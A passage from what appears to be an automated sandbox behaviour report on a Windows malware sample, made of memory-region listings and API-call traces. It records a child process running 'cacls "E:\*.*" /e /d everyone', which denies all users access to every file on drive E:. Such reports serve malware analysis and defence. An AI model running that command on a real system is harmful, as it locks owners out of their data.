0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1134 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1135 start_va = 0x7efe0000 end_va = 0x7f002fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1136 start_va = 0x7f003000 end_va = 0x7f003fff entry_point = 0x0 region_type = private name = "private_0x000000007f003000" filename = "" Region: id = 1137 start_va = 0x7f00b000 end_va = 0x7f00bfff entry_point = 0x0 region_type = private name = "private_0x000000007f00b000" filename = "" Region: id = 1138 start_va = 0x7f00d000 end_va = 0x7f00ffff entry_point = 0x0 region_type = private name = "private_0x000000007f00d000" filename = "" Region: id = 1139 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1140 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1141 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1142 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1161 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1162 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1163 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1164 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1165 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 1166 start_va = 0x520000 end_va = 0x59dfff entry_point = 0x520000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1167 start_va = 0x650000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 1168 start_va = 0x840000 end_va = 0x84ffff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1169 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1170 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1171 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1172 start_va = 0x7eee0000 end_va = 0x7efdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eee0000" filename = "" Region: id = 1173 start_va = 0x330000 end_va = 0x333fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Thread: id = 30 os_tid = 0x6a8 [0036.720] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0036.720] __set_app_type (_Type=0x1) [0036.720] __p__fmode () returned 0x76ea1768 [0036.720] __p__commode () returned 0x76ea176c [0036.720] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0036.720] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0036.720] GetCurrentThreadId () returned 0x6a8 [0036.720] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6a8) returned 0x30 [0036.720] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0036.720] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0036.720] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.722] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0036.722] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x49f960 | out: phkResult=0x49f960*=0x0) returned 0x2 [0036.722] VirtualQuery (in: lpAddress=0x49f96f, lpBuffer=0x49f908, dwLength=0x1c | out: lpBuffer=0x49f908*(BaseAddress=0x49f000, AllocationBase=0x3a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.722] VirtualQuery (in: lpAddress=0x3a0000, lpBuffer=0x49f908, dwLength=0x1c | out: lpBuffer=0x49f908*(BaseAddress=0x3a0000, AllocationBase=0x3a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0036.722] VirtualQuery (in: lpAddress=0x3a1000, lpBuffer=0x49f908, dwLength=0x1c | out: lpBuffer=0x49f908*(BaseAddress=0x3a1000, AllocationBase=0x3a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0036.722] VirtualQuery (in: lpAddress=0x3a3000, lpBuffer=0x49f908, dwLength=0x1c | out: lpBuffer=0x49f908*(BaseAddress=0x3a3000, AllocationBase=0x3a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.722] VirtualQuery (in: lpAddress=0x4a0000, lpBuffer=0x49f908, dwLength=0x1c | out: lpBuffer=0x49f908*(BaseAddress=0x4a0000, AllocationBase=0x4a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0036.722] GetConsoleOutputCP () returned 0x1b5 [0036.722] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.722] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0036.723] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.723] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0036.723] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.723] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0036.723] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.723] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.723] GetEnvironmentStringsW () returned 0x654058* [0036.723] FreeEnvironmentStringsA (penv="=") returned 1 [0036.723] GetEnvironmentStringsW () returned 0x654058* [0036.723] FreeEnvironmentStringsA (penv="=") returned 1 [0036.723] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x49e8b0 | out: phkResult=0x49e8b0*=0x40) returned 0x0 [0036.723] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x49e8b8, lpData=0x49e8bc, lpcbData=0x49e8b4*=0x1000 | out: lpType=0x49e8b8*=0x0, lpData=0x49e8bc*=0x0, lpcbData=0x49e8b4*=0x1000) returned 0x2 [0036.723] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x49e8b8, lpData=0x49e8bc, lpcbData=0x49e8b4*=0x1000 | out: lpType=0x49e8b8*=0x4, lpData=0x49e8bc*=0x1, lpcbData=0x49e8b4*=0x4) returned 0x0 [0036.723] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x49e8b8, lpData=0x49e8bc, lpcbData=0x49e8b4*=0x1000 | out: lpType=0x49e8b8*=0x0, lpData=0x49e8bc*=0x1, lpcbData=0x49e8b4*=0x1000) returned 0x2 [0036.723] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x49e8b8, lpData=0x49e8bc, lpcbData=0x49e8b4*=0x1000 | out: lpType=0x49e8b8*=0x4, lpData=0x49e8bc*=0x0, lpcbData=0x49e8b4*=0x4) returned 0x0 [0036.723] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x49e8b8, lpData=0x49e8bc, lpcbData=0x49e8b4*=0x1000 | out: lpType=0x49e8b8*=0x4, lpData=0x49e8bc*=0x40, lpcbData=0x49e8b4*=0x4) returned 0x0 [0036.723] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x49e8b8, lpData=0x49e8bc, lpcbData=0x49e8b4*=0x1000 | out: lpType=0x49e8b8*=0x4, lpData=0x49e8bc*=0x40, lpcbData=0x49e8b4*=0x4) returned 0x0 [0036.723] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x49e8b8, lpData=0x49e8bc, lpcbData=0x49e8b4*=0x1000 | out: lpType=0x49e8b8*=0x0, lpData=0x49e8bc*=0x40, lpcbData=0x49e8b4*=0x1000) returned 0x2 [0036.723] RegCloseKey (hKey=0x40) returned 0x0 [0036.724] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x49e8b0 | out: phkResult=0x49e8b0*=0x40) returned 0x0 [0036.724] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x49e8b8, lpData=0x49e8bc, lpcbData=0x49e8b4*=0x1000 | out: lpType=0x49e8b8*=0x0, lpData=0x49e8bc*=0x40, lpcbData=0x49e8b4*=0x1000) returned 0x2 [0036.724] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x49e8b8, lpData=0x49e8bc, lpcbData=0x49e8b4*=0x1000 | out: lpType=0x49e8b8*=0x4, lpData=0x49e8bc*=0x1, lpcbData=0x49e8b4*=0x4) returned 0x0 [0036.724] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x49e8b8, lpData=0x49e8bc, lpcbData=0x49e8b4*=0x1000 | out: lpType=0x49e8b8*=0x0, lpData=0x49e8bc*=0x1, lpcbData=0x49e8b4*=0x1000) returned 0x2 [0036.724] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x49e8b8, lpData=0x49e8bc, lpcbData=0x49e8b4*=0x1000 | out: lpType=0x49e8b8*=0x4, lpData=0x49e8bc*=0x0, lpcbData=0x49e8b4*=0x4) returned 0x0 [0036.724] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x49e8b8, lpData=0x49e8bc, lpcbData=0x49e8b4*=0x1000 | out: lpType=0x49e8b8*=0x4, lpData=0x49e8bc*=0x9, lpcbData=0x49e8b4*=0x4) returned 0x0 [0036.724] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x49e8b8, lpData=0x49e8bc, lpcbData=0x49e8b4*=0x1000 | out: lpType=0x49e8b8*=0x4, lpData=0x49e8bc*=0x9, lpcbData=0x49e8b4*=0x4) returned 0x0 [0036.724] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x49e8b8, lpData=0x49e8bc, lpcbData=0x49e8b4*=0x1000 | out: lpType=0x49e8b8*=0x0, lpData=0x49e8bc*=0x9, lpcbData=0x49e8b4*=0x1000) returned 0x2 [0036.724] RegCloseKey (hKey=0x40) returned 0x0 [0036.724] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5004f [0036.724] srand (_Seed=0x5aa5004f) [0036.724] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0036.724] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0036.724] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.724] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x654060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0036.724] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.724] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.724] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0036.724] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.724] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0036.724] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0036.724] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0036.724] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0036.724] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0036.724] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0036.724] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0036.724] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0036.724] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0036.724] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f690 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.724] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x49f690, lpFilePart=0x49f68c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x49f68c*="Desktop") returned 0x1c [0036.725] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0036.725] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x49f408 | out: lpFindFileData=0x49f408) returned 0x654270 [0036.725] FindClose (in: hFindFile=0x654270 | out: hFindFile=0x654270) returned 1 [0036.725] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x49f408 | out: lpFindFileData=0x49f408) returned 0x654270 [0036.725] FindClose (in: hFindFile=0x654270 | out: hFindFile=0x654270) returned 1 [0036.725] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0036.725] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x49f408 | out: lpFindFileData=0x49f408) returned 0x654270 [0036.725] FindClose (in: hFindFile=0x654270 | out: hFindFile=0x654270) returned 1 [0036.725] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0036.725] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0036.725] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0036.725] GetEnvironmentStringsW () returned 0x6560b0* [0036.725] FreeEnvironmentStringsA (penv="=") returned 1 [0036.725] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.726] GetConsoleOutputCP () returned 0x1b5 [0036.726] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.726] GetUserDefaultLCID () returned 0x409 [0036.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0036.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x49f7bc, cchData=128 | out: lpLCData="0") returned 2 [0036.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x49f7bc, cchData=128 | out: lpLCData="0") returned 2 [0036.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x49f7bc, cchData=128 | out: lpLCData="1") returned 2 [0036.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0036.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0036.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0036.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0036.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0036.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0036.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0036.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0036.727] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0036.727] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0036.727] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0036.727] GetConsoleTitleW (in: lpConsoleTitle=0x654d78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.728] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0036.728] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0036.728] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0036.728] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0036.728] _wcsicmp (_String1="echo", _String2=")") returned 60 [0036.728] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0036.728] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0036.728] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0036.728] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0036.728] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0036.728] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0036.729] GetConsoleTitleW (in: lpConsoleTitle=0x49f4b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.729] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.729] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.729] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.729] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.729] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.729] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.729] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.729] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.729] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.729] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.730] _vsnwprintf (in: _Buffer=0x12c8840, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x49f46c | out: _Buffer="y\r\n") returned 3 [0036.730] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.730] GetFileType (hFile=0x28) returned 0x3 [0036.730] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.730] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="y\r\n", cchWideChar=-1, lpMultiByteStr=0x12b6840, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\r\n", lpUsedDefaultChar=0x0) returned 4 [0036.730] WriteFile (in: hFile=0x28, lpBuffer=0x12b6840*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0x49f45c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesWritten=0x49f45c*=0x3, lpOverlapped=0x0) returned 1 [0036.730] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.730] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0036.730] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.730] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0036.730] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.730] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.730] SetConsoleInputExeNameW () returned 0x1 [0036.730] GetConsoleOutputCP () returned 0x1b5 [0036.730] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.730] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.733] exit (_Code=0) Process: id = "29" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x132a1000" os_pid = "0x770" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "cacls \"E:\\*.*\" /e /d everyone" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1143 start_va = 0x770000 end_va = 0x78ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 1144 start_va = 0x790000 end_va = 0x791fff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1145 start_va = 0x7a0000 end_va = 0x7aefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 1146 start_va = 0x7b0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 1147 start_va = 0x7f0000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 1148 start_va = 0x830000 end_va = 0x833fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 1149 start_va = 0x840000 end_va = 0x840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 1150 start_va = 0x850000 end_va = 0x851fff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 1151 start_va = 0xb30000 end_va = 0xb39fff entry_point = 0xb30000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 1152 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1153 start_va = 0x7f080000 end_va = 0x7f0a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f080000" filename = "" Region: id = 1154 start_va = 0x7f0aa000 end_va = 0x7f0aafff entry_point = 0x0 region_type = private name = "private_0x000000007f0aa000" filename = "" Region: id = 1155 start_va = 0x7f0ab000 end_va = 0x7f0abfff entry_point = 0x0 region_type = private name = "private_0x000000007f0ab000" filename = "" Region: id = 1156 start_va = 0x7f0ad000 end_va = 0x7f0affff entry_point = 0x0 region_type = private name = "private_0x000000007f0ad000" filename = "" Region: id = 1157 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1158 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1159 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1160 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1174 start_va = 0x990000 end_va = 0x99ffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 1175 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1176 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1177 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Thread: id = 31 os_tid = 0xbfc Process: id = "30" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x134af000" os_pid = "0x9a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1178 start_va = 0xb0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1179 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1180 start_va = 0xe0000 end_va = 0xeefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1181 start_va = 0xf0000 end_va = 0x12ffff 